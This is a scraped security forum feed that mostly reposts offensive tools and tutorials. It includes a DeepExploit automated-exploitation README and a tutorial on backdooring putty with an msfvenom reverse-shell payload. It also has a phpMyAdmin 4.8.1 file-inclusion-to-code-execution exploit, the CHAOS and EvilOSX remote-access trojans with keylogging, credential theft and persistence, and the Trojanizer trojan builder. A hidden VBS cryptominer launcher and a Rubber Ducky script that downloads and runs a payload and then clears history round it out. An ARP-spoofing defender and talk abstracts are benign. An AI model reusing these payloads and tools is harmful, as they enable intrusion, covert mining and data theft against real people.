result of hosts command. Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.220.145 00:0c:29:16:3a:ce Linux 2.6.X server DeepExploit gets OS type using regular expression from result of hosts command. In above example, DeepExploit gets OS type as Linux. ex) The result of services command. Services ======== host port proto info ---- ---- ----- ---- 192.168.220.145 21 tcp vsftpd 2.3.4 192.168.220.145 22 tcp OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0 192.168.220.145 23 tcp Linux telnetd 192.168.220.145 25 tcp Postfix smtpd 192.168.220.145 53 tcp ISC BIND 9.4.2 ...snip... 192.168.220.145 5900 tcp VNC protocol 3.3 192.168.220.145 6000 tcp access denied 192.168.220.145 6667 tcp UnrealIRCd 192.168.220.145 8009 tcp Apache Jserv Protocol v1.3 192.168.220.145 8180 tcp Apache Tomcat/Coyote JSP engine 1.1 RHOSTS => 192.168.220.145 DeepExploit gets other information such as opened port numbers, protocol types, product name, product version using regular expression from result of service command. In above example, DeepExploit gets following information from the target server. Idx OS Port# Protocol product version 1 Linux 21 tcp vsftpd 2.3.4 2 Linux 22 tcp ssh 4.7p1 3 Linux 23 tcp telnet - 4 Linux 25 tcp postfix - 5 Linux 53 tcp bind 9.4.2 6 Linux 5900 tcp vnc 3.3 7 Linux 6667 tcp irc - 8 Linux 8180 tcp tomcat - Step 2. Training. DeepExploit learns how to method of exploitation using advanced machine learning model called A3C. The A3C consists of multiple neural networks. The neural networks takes the information of the training server gathered in Step1 as input and outputs some kinds of Payload. And the A3C uses the output Payload to Exploit to the training server via Metasploit. In accordance with the result (success / failure) of Exploit, the A3C updates the weight of the neural network (parameter related to attack accuracy). By performing the above processing (learning) with a combination of various inputs, an optimum Payload for input information is gradually output. In order to shorten the learning time, we execute this processing in multi threads. Therefore, learning by using various training servers, DeepExploit can execute accurate exploit according to various situations. So, DeepExploit uses training servers such as metasploitable3, metasploitable2, owaspbwa for learning. Training servers (one example) metasploitable2 metasploitable3 others Step 3. Testing. DeepExploit execute exploit to the testing server using learned result in Step2. It can execute exploits at pinpoint (minimum 1 attempt). Step 4. Post exploit. If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard. Step 5. Generate report. DeepExploit generates a report that summarizes vulnerabilities. Report's style is html. Brute force mode Step 1. Getting target products. DeepExploit receives a target product name list from the user via the console. Each product names are separated by "@" mark. ex) Target product name list. wordpress@joomla@drupal@tikiwiki Step 2. Exploit. DeepExploit takes Exploit modules, Targets, Payloads of Metasploit corresponding to the specified products and executes exploit thoroughly using all combinations of them. Step 3. Post exploit. If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard. Step 4. Generate report. DeepExploit generates a report that summarizes vulnerabilities. Report's style is html. Installation Step.0 Git clone DeepExploit's repository. local@client:~$ git clone https://github.com/13o-bbr-bbq/machine_learning_security.git Step.1 Install required packages. local@client:~$ cd machine_learning_security/DeepExploit local@client:~$ python install -r requirements.txt Step.2 Change the setting of Keras. Keras is library of machine learning linked with Tensorflow. So, you need to edit Keras config file "keras.json" before run Deep Exploit. local@client:~$ cd "your home directory"/.keras local@client:~$ vim keras.json keras.json { "epsilon": 1e-07, "floatx": "float32", "image_data_format": "channels_last", "backend": "tensorflow" } You rewrite the element of "backend" to "tensorflow". Installation is over. Usage Step.0 Initialize Metasploit DB Common Firstly, you initialize metasploit db (postgreSQL) using msfdb command. root@kali:~# msfdb init Step.1 Launch Metasploit Framework You launch Metasploit on the remote server that installed Metasploit Framework such as Kali Linux. root@kali:~# msfconsole ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \\ / / \\ . / / x \\ / / \\ / + / \\ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \\ / \\ / \\ ########### / \\ / \\ / \\ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ https://metasploit.com =[ metasploit v4.16.15-dev ] + -- --=[ 1699 exploits - 968 auxiliary - 299 post ] + -- --=[ 503 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > Step.2 Launch RPC Server You launch RPC Server of Metasploit following. msf> load msgrpc ServerHost=192.168.220.144 ServerPort=55553 User=test Pass=test1234 [*] MSGRPC Service: 192.168.220.144:55553 [*] MSGRPC Username: test [*] MSGRPC Password: test1234 [*] Successfully loaded plugin: msgrpc msgrpc options description ServerHost IP address of your server that launched Metasploit. Above example is 192.168.220.144. ServerPort Any port number of your server that launched Metasploit. Above example is 55553. User Any user name using authentication (default => msf). Above example is test. Pass Any password using authentication (default => random string). Above example is test1234. Step.3 Edit config file. You have to change following value in config.ini ...snip... [Common] server_host : 192.168.220.144 server_port : 55553 msgrpc_user : test msgrpc_pass : test1234 ...snip... [Metasploit] lhost : 192.168.220.144 config description server_host IP address of your server that launched Metasploit. Your setting value ServerHost in Step2. server_port Any port number of your server that launched Metasploit. Your setting value ServerPort in Step2. msgrpc_user Metasploit's user name using authentication. Your setting value User in Step2. msgrpc_pass Metasploit's password using authentication. Your setting value Pass in Step2. lhost IP address of your server that launched Metasploit. Your setting value ServerHost in Step2. Intelligence mode Step.4 Train Deep Exploit You execute Deep Exploit with training mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.132 -m train command options description -t, --target IP address of training vulnerable host such as Metasploitable2. -m, --mode Execution mode "train". Demo) learning with 10 threads. Step.5 Test using trained Deep Exploit You execute Deep Exploit with testing mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.129 -m test command options description -t, --target IP address of test target host. -m, --mode Execution mode "test". Demo) testing with 1 thread. Step.6 Check scan report. Please check scan report using any web browser. local@client:~$ firefox "Deep Exploit root path"/report/DeepExploit_report.html Brute force mode Step.4 Brute force Deep Exploit You execute DeepExploit with brute force mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.132 -p 80 -s wordpress@joomla@drupal@tikiwiki command options description -t, --target IP address of test target host. -p, --port Indicate port number of target server. -s, --service Indicate product name of target server. Demo) Brute force mode. Coming soon!! Step.5 Check scan report Please check scan report using any web browser. Tips 1. How to change "Exploit module's option". When Deep Exploit exploits, it uses default value of Exploit module options. If you want to change option values, please input any value to "user_specify" in exploit_tree.json as following. "unix/webapp/joomla_media_upload_exec": { "targets": { "0": [ "generic/custom", "generic/shell_bind_tcp", "generic/shell_reverse_tcp", ...snip... "TARGETURI": { "type": "string", "required": true, "advanced": false, "evasion": false, "desc": "The base path to Joomla", "default": "/joomla", "user_specify": "/my_original_dir/" }, Above example is to change value of TARGETURI option in exploit module "exploit/unix/webapp/joomla_media_upload_exec" to "/my_original_dir/" from "/joomla". Operation check environment Kali Linux 2017.3 (Guest OS on VMWare) Memory: 8.0GB Metasploit Framework 4.16.15-dev Windows 10 Home 64-bit (Host OS) CPU: Intel(R) Core(TM) i7-6500U 2.50GHz Memory: 16.0GB Python 3.6.1(Anaconda3) tensorflow 1.4.0 Keras 2.1.2 msgpack 0.4.8 docopt 0.6.2 More information MBSD Blog Sorry, now Japanese only. English version is coming soon Licence Apache License 2.0 Contact us Isao Takaesu takaesu235@gmail.com https://twitter.com/bbr_bbq Source
  16. OKQL

    am nevoie de un programator

    da-mi PM cu site-urile si vrei sa modifici la ele
  17. Welcome to my next blog post. Today i want to show you some basic pentesting stuff. We will manually backdooring a PE-File, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit Putty Stud_PE Immunity Debugger Before we are getting our hands into assembly, i want to explain what we will do. We will add a section header named .evil to our file and hijack the file‘s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts). #0x01 Adding Section At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining I choosed a section size of 1500 Bytes which are filled with nullbytes. That‘s more than enough for our shellcode. After saving the file and load it into Immunity you can see the differences between the two files (new section .evil is spawned). And if you look at the adress of .evil you will see the following (our predifined nullbytes) -> Great! While checking our new section you may noticed, that the adresses has slighty changed. The last 4 Bytes are always nullbytes but the first 4 Bytes are changing through every reloading process of the file. 00FB0000 <-> 00250000 That‘s a kernel protection ASLR, you can find more information about this countermeasurement here. This makes some more work, but isn‘t a problem (more later). #0x02 Hijack Execution Flow Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the ‚old‘ instructions to a text file, because we are going to resume to the application flow after executing our shellcode. Mark the first instruction and type „jmp [adress of .evil]“ in my case „jmp 0x002E3000“. After hitting enter you will see the following: Save the changes to a new file and open it in immunity. Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil adress. For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instruction pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully). Now we do some math do encounter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the „old“ execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved adress from our textfile just like „call x002B8265“, but you see that the adress of the second instruction „jmp 0x002B7E6E“ has also changed… ASLR Hurray! What now? We have to determine the offset between the old adresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, adresses and relations i try to show it in following pictures (if this isn‘t enough, plz tell me via twitter and i will add text sections) In the end we got the „new“ adress for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instrution at the entry point via „jmp 0x01067FD8“ and the execution will flow. #0x03 Inject Shellcode Choose your favourit shellcode or generate a new one . I used following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex Then use the binary paste function of Immunity to replace some of our nops with the shellcode. Save the file and voila, you sucessfully backdoored a PE-File ! Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released. To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 0x04 PoC Start your listener and fire up the application. Thanks for reading and if you like this post, check my twitter account please! xD Source: hansesecure.de
  18. Author: @Ambulong Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability. VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/ Vulnerability Details 1.Line 54-63 in file /index.php: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 2.Core::checkPageValidity in /libraries/classes/Core.php /** * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist) * * checks given $page against given $whitelist and returns true if valid * it optionally ignores query parameters in $page (script.php?ignored) * * @param string &$page page to check * @param array $whitelist whitelist to check page against * * @return boolean whether $page is valid or not (in $whitelist or not) */ public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } Core::checkPageValidity can be bypassed by using by double encoding like %253f. Exploit An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability. 1.Use username root, password toor log into phpmyadmin. Login PMA 2.Run SQL query select '<?php phpinfo();exit;?>' Login PMA 3.Get your Session ID Session ID is the item phpMyAdmin in your cookie. Login PMA 4.Include the session file http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k Login PMA Source: blog.vulnspy.com
  19. ARPPD ARP Poisoning Defender This is a small script I have written in C to provide protection against malicious ARP attacks, changing the gateway's MAC Address in the ARP table of a victim's PC. How it works The program saves the Gateway's MAC and IP Address when started. It then scans for every incoming ARP packet to see if it has the ARP Source of the gateway's ip. It blocks these packets (without a delay, like in other ARP defending scripts) using arptables, and instantly updates the ARP table to match the gateway's IP and MAC. It keeps the attacker's MAC address blocked for receiving ARP packets for 5 minutes. When the program exists, it allows all MAC addresses to send ARP packets again (to the PC running the script), as well as flushing the ARP table. Cross Platform For now, the script only works on linux. I will try to release a win64 version ASAP. Installation and build ARPPD needs arptables to run, so just install it: sudo apt-get install arptables There's a pre-built executable in the builds folder, or build it yourself: To build: Run compile_arppd_linux OR Go in the main directory Run: gcc -o builds/defender-win64 src-win64/defender.c -lpcap -pthread Malicious ARP Packets When the ARPPD will detect a malicious ARP Packet, it will look like this: Video Download: ARPPD-master.zip or git clone https://github.com/Prodicode/ARPPD.git Source
  20. CHAOS allow generate payloads and control remote Windows systems. Disclaimer This project was created only for learning purpose. THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM. Features Reverse Shell Download File Upload File Screenshot Keylogger Persistence Open URL Remotely Get Operating System Name Run Fork Bomb Tested On Kali Linux - ROLLING EDITION How To Use # Install dependencies (You need Golang and UPX package installed) $ apt install golang xterm git upx-ucl -y # Clone this repository $ git clone https://github.com/tiagorlampert/CHAOS.git # Get and install external imports (requirement to screenshot) $ go get github.com/kbinani/screenshot && go get github.com/lxn/win $ go install github.com/kbinani/screenshot && go install github.com/lxn/win # Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files". # It's occurs because the libraries are to windows systems, but it necessary to build the payload. # Go into the repository $ cd CHAOS # Run $ go run CHAOS.go Screenshot (outdated) Video Source
  21. TROJANIZER Version release : v1.1 (Stable) Author : pedro ubuntu [ r00t-3xp10it ] Codename: Troia_Revisited Distros Supported : Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2017 FRAMEWORK DESCRIPTION The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time). To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1). 'Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior' (execute the payload in background, while the legit application executes in foreground). DEPENDENCIES (backend applications) Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine) "Trojanizer.sh will download/install all dependencies as they are needed" ╔────────────────────────────────────────────────────────────────────────────────────────────╗ | It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] | | in the 'settings' file before attempting to run the tool for the first time. | ╚────────────────────────────────────────────────────────────────────────────────────────────╝ PAYLOADS (agents) ACCEPTED .exe | .bat | .vbs | .ps1 "All payloads that windows/SFX can auto-extract-execute" HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed. LEGIT APPLICATIONS ACCEPTED (decoys) .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc .. "All applications that windows/SFX can auto-extract-execute" Advanced Settings Trojanizer and APPL Whitelisting Bypasses Framework Screenshots Video Tutorials Trojanizer - AVG anti-virus fake installer (trojan behavior) Trojanizer - single_file_execution (not trojan behavior) Download/Install 1º - Download framework from github git clone https://github.com/r00t-3xp10it/trojanizer.git 2º - Set files execution permitions cd trojanizer sudo chmod +x *.sh 3º - config framework nano settings 4º - Run main tool sudo ./Trojanizer.sh Source
  22. While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers. About the Speakers Matt Knight Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College. Ryan Speers Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC link: https://www.troopers.de/troopers18/agenda/rgdyd3/
  23. Hidden.vbs Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "miner.bat" & Chr(34), 0 Set WshShell = Nothing Miner.bat minergate-cli --user email@gmail.com --xmr 1 Minergate https://minergate.com Source: fsecu
  24. AlphaBay Market was by far the largest and most prolific provider of cyber crime and fraudulent services in the world prior to its seizure by the FBI on July 4, 2017. While the Tor-based marketplace was most famous for the sale of narcotics, firearms, and stolen goods, AlphaBay’s forum was the epicenter of the English-speaking cyber criminal community. During the site’s tenure, it provided a rich source of intelligence on the tactics, techniques, and operations of cyber criminal groups targeting a wide range of corporations and selling exfiltrated data through the marketplace securely and anonymously. This included visibility into the attack cycle, AlphaBay operating as a bridge between the English and Russian language cyber criminal communities, and the likely role of AlphaBay’s administrators in cryptocurrency market manipulation on a large scale. This presentation will discuss iDefense’s research into AlphaBay Market as a case study on how in-depth analysis of underground communities can contribute to an organization’s security posture. It will provide a detailed discussion of the tradecraft and methodologies used for underground intelligence, such as the use of undercover personas and how to apply social engineering techniques to gain additional intelligence. It will also discuss the strengths and weaknesses of such an approach and the risks associated with cyber underground collection. Finally, the case study will present lessons learned from engagement and analysis of criminal underground communities and how attendees can integrate cyber underground intelligence into their threat intelligence program. Christy Quinn (@ChristyQuinn), Security Specialist – Cyber Threat Intelligence, iDefense – Accenture Security
  25. EvilOSX A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX. Features Emulate a simple terminal instance Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication) Multi-threaded No client dependencies (pure python) Persistent Simple extendable module system Retrieve Chrome passwords Retrieve iCloud tokens and contacts Phish for iCloud passwords via iTunes Download and upload files Take a picture using the webcam Record microphone input iTunes iOS backup enumeration Retrieve or monitor the clipboard Retrieve browser history (Chrome and Safari) Attempt to get root via local privilege escalation Auto installer, simply run EvilOSX on your target and the rest is handled automatically How To Use The server side requires python3 to run (probably already installed on your system). # Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Install dependencies required by the server $ sudo pip3 install -r requirements.txt # Go into the repository $ cd EvilOSX # Build a launcher to infect your target $ python builder.py # Start listening for connections $ python start.py # Lastly, run the built launcher on your target Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time. Screenshots Motivation This project was created to be used with my Rubber Ducky, here's the simple script: REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX REM Also see https://ducktoolkit.com/vidpid/ DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500 REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER Takes about 10 seconds to backdoor any unlocked Mac, which is...... nice Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for. Source
×